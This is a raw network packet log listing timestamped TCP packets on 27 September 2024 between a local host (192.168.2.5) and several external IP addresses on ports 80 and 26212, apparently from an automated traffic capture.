Sep 27, 2024 04:21:16.217753887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217767954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217781067 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217782021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217794895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217802048 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217807055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217819929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217832088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217832088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217844009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217855930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217866898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217871904 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217871904 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217879057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217895985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217899084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217926025 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217947006 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223171949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223236084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223248005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223257065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223283052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223290920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223301888 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223304987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223321915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223335981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223356009 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223356009 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223376036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223378897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223396063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223428011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223458052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223469973 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223481894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223494053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223505020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223514080 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223535061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223551035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.223553896 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.223606110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.244827986 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.245341063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.245352030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.245362997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.245414019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.245419025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.245430946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.245444059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.245455027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.245456934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.245488882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.245532990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.246865988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.246884108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.246893883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.246974945 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.246974945 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.247036934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.247055054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.247067928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.247080088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.247098923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.247098923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.247137070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.250186920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250200033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250210047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250256062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250267029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250279903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250272989 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.250291109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250324011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.250324011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.250328064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250345945 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250348091 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.250359058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250370979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250377893 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.250384092 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250397921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250408888 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.250408888 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.250421047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.250452042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.250483036 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.251523018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251533985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251545906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251579046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251633883 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251677990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251689911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251702070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251712084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251743078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251743078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251807928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251872063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251883030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251893997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251904964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251916885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.251929045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251929045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251949072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251990080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.251996040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252007961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252048969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.252048969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.252341986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252353907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252365112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252397060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.252409935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.252410889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252409935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.252423048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252434969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252444983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.252466917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.252466917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.252623081 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253142118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253153086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253164053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253196955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253209114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253221035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253232002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253246069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253246069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253284931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253437042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253448009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253460884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253473043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253515005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253515005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253814936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253825903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253838062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253853083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253861904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253884077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253884077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253906965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253917933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253927946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253938913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253950119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253951073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253951073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.253968954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253981113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.253984928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254026890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254026890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254126072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254137993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254148006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254167080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254174948 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254179001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254198074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254235029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254270077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254287958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254300117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254312038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254333973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254333973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254368067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254379034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254379988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254396915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254410028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254411936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254422903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254429102 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254435062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.254472017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.254472017 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.263320923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.263430119 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.263475895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.263484955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.263500929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.263514996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.263523102 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.263525963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.263537884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.263541937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.263547897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.263585091 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.263633966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.279145956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.279234886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.279292107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.279304028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.279314041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.279337883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.279341936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.279350996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.279361963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.279364109 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.279380083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279401064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279412985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279431105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279434919 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.279434919 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.279444933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279457092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279479027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.279479027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.279535055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.279572964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279582977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279593945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279612064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279623985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279633045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279660940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.279661894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.279690027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279700994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279723883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279733896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.279748917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.279750109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.279787064 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.279787064 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280359983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280371904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280383110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280421972 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280441999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280452013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280462027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280472994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280482054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280482054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280499935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280580044 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280587912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280599117 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280616045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280653954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280653954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280689001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280699015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280709982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280720949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.280740023 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.280780077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.286185026 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:16.300348043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.300376892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.300389051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.300407887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.300419092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.300430059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.300441027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.300465107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.300487041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.300487041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.300553083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.301974058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.301984072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.301995039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.302042961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.302053928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.302064896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.302074909 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.302076101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.302087069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.302125931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.302177906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.302261114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.302301884 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.303680897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.303757906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.303807020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.303817034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.303827047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.303838015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.303848028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.303859949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.303869963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.303870916 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.303924084 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.303925037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.304337025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.304409981 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.304461002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.304472923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.304482937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.304493904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.304503918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.304517031 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.304519892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.304546118 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.304567099 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.304569960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.304616928 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.306665897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306740046 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.306754112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306763887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306775093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306785107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306796074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306813002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306822062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306833029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306837082 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.306870937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.306901932 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.306917906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306927919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306937933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306948900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306960106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306973934 CEST	49724	80	192.168.2.5	176.113.115.95
